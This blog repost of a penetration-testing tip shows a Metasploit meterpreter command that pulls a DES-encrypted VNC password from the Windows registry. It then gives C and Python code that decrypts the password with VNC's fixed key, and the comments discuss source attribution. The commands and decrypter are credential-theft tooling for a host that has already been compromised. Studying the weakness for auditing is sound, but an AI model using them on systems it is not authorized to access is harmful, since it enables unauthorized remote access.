Mar 16, 2011

VNC passwords and Metasploit and DES

Inside your meterpreter shell, run getvncpw:
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

You're probably asking yourself what the F kind of password 3290e... is. Well, it's DES encrypted. Lucky for us, the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
Change the relevant section:
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spat out 3290e903b5bf3769, so that line becomes:
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
Or use this one:
http://www.consume.org/~jshare/vncdec.c
which takes the hash on the command line, so you don't have to recompile every time.
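The same decryption in Python, as an added example that is not code from the original post or from vncdec.c. The fixed key is the one in the vncpasswd source, {23,82,107,6,35,78,88,7}; VNC's own d3des reads key bits back to front per byte, so a standard DES library needs the bit-mirrored key e84ad660c4721ae0. It assumes pycryptodome or the cryptography package is installed, and it also shows the encrypt direction so the 8-character truncation and NUL padding are visible.

```python
"""Decrypt a WinVNC/RealVNC registry password blob with VNC's fixed DES key."""

# The fixed key as written in the vncpasswd source (decimal bytes). VNC's bundled
# d3des reads key bits in the reverse order of standard DES, so each byte must be
# bit-mirrored before a normal DES library will produce the same result.
VNC_FIXED_KEY = bytes([23, 82, 107, 6, 35, 78, 88, 7])

def reverse_bits(byte: int) -> int:
    """Mirror the 8 bits of one byte: 0x17 (00010111) -> 0xE8 (11101000)."""
    return int(f"{byte:08b}"[::-1], 2)

def standard_des_key(vnc_key: bytes = VNC_FIXED_KEY) -> bytes:
    """The fixed key in standard-DES bit order (e84ad660c4721ae0)."""
    return bytes(reverse_bits(b) for b in vnc_key)

def _des_ecb(key: bytes, block: bytes, decrypt: bool) -> bytes:
    """One-block DES-ECB via pycryptodome if installed, else cryptography."""
    try:
        from Crypto.Cipher import DES
        cipher = DES.new(key, DES.MODE_ECB)
        return cipher.decrypt(block) if decrypt else cipher.encrypt(block)
    except ImportError:
        from cryptography.hazmat.primitives.ciphers import Cipher, modes
        try:
            from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
        except ImportError:  # releases before TripleDES moved to 'decrepit'
            from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
        # An 8-byte TripleDES key expands to K1=K2=K3, i.e. plain single DES.
        ctx = Cipher(TripleDES(key), modes.ECB())
        ctx = ctx.decryptor() if decrypt else ctx.encryptor()
        return ctx.update(block) + ctx.finalize()

def encrypt_vnc_password(password: str) -> str:
    """What vncpasswd does: truncate to 8 chars, NUL-pad, DES-encrypt, hex-encode."""
    block = password.encode("latin-1")[:8].ljust(8, b"\x00")
    return _des_ecb(standard_des_key(), block, decrypt=False).hex()

def decrypt_vnc_password(hex_blob: str) -> str:
    """Reverse it: the hex value getvncpw prints -> cleartext, trailing NULs dropped."""
    block = bytes.fromhex(hex_blob)
    if len(block) != 8:
        raise ValueError("a VNC password blob is exactly 8 bytes")
    plain = _des_ecb(standard_des_key(), block, decrypt=True)
    return plain.rstrip(b"\x00").decode("latin-1")

if __name__ == "__main__":
    # The value from the post above; the post reports that it decrypts to "demopass".
    print(decrypt_vnc_password("3290e903b5bf3769"))
```

Because the key is fixed and public, the registry value is effectively an obfuscated cleartext, which is why read access to that key should be treated as disclosure of the password.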

Source: http://carnal0wnage.attackresearch.com/node/446

3 comments:

CG said...
This comment has been removed by the author.
Medt said...

At the end of all my posts, I post where I got it from with "Source:", and in this post I said the source is "Source: http://carnal0wnage.attackresearch.com/node/446".

Did you see it?

Medt said...

For CG, I'm so sorry, it was my mistake to delete your comment. I really didn't want to do that. -*- Sorry again. And I want to tell you that for every post in this blog I always link to the source with "Source:". I'm so sorry if you think I'm unclear about the source of this article.
